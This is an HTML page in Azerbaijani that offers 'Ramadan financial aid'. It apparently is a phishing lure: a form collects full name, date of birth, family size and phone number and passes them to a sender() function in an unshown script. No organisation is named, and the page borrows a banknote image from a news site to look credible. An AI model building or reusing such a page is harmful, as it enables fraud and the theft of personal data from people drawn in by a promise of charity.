 <html>
 <head> 
 <title>Ramazan ayı maddi yardım</title> 
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta charset="utf-8"/>  
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="az/main.js"></script>
<style>  
/* The following tag selector body use the font-family and background-color properties for body of a page*/  
body{  
font-family: Calibri, Helvetica, sans-serif;  
background-color: pink;  
}  
/* Following container class used padding for generate space around it, and also use a background-color for specify the color #0fa76d as a background */    
.container {  
padding: 50px;  
background-color: #0fa76d;  
}  
/* The following tag selector input use the different properties for the text filed. */  
input[type=text] {  
  width: 100%;  
  padding: 15px;  
margin: 5px 0 22px 0;  
display: inline-block;  
 border: none;  
 background: #f1f1f1;  
}  
input[type=text]:focus {  
background-color: orange;  
outline: none;  
}  
 div {  
            padding: 10px 0;  
              
        }  
  
hr {  
  border: 1px solid #f1f1f1;  
  margin-bottom: 25px;  
}  
/* The following tag selector button use the different properties for the Button. */  
button {  
  background-color: #001e25;  
  color: white;  
  padding: 16px 20px;  
 border: none;  
  cursor: pointer;  
 margin: 8px 0;  
  width: 100%;  
  opacity: 0.9;  
}  
  
button:hover {  
opacity: 1;  
}  
  
  
  
</style>  
</head>  
<body>  


<form action="" onsubmit=" return sender()">
	 
<div class="container">  
		<center>
			<img src="https://banco.az/sites/default/files/news/azerbaijani-manat-business-table_52793-859_1_12.jpg" width="290" alt="">
		
		</center>
<center><h1>Ramazan ayı münasibəti</h1></center> 
<center><h1>ilə maddi yardım</h1></center> 
    
<br>
  
<label> <center><h2>tam adı<h2></center> 
<input type="text" name="full name" placeholder="" id="name" size="15" required="">   
</label>   
<label> <center><h2>Doğum tarixi<h2></center>    
<input type="text" name="date" placeholder="" id="date" size="15" required="">   
</label>   
<label> <center><h2>Ailənizdə neçə nəfərsiniz?<h2></center> 
<input type="text" name="many family" placeholder="" id="many_family" size="15" required="">   
</label>   
<div>  
<label> <center><h2>Sizin telefon nömrəniz<h2></center> 

<input type="text" name="phone" required placeholder="" value="" id="phone" size="2">   
</label>   
</div>  
<br>
<br>
<br>

  <button type="submit" value="submit"><h1>Davam Et</h1></button>  

</div></form></body>

</html>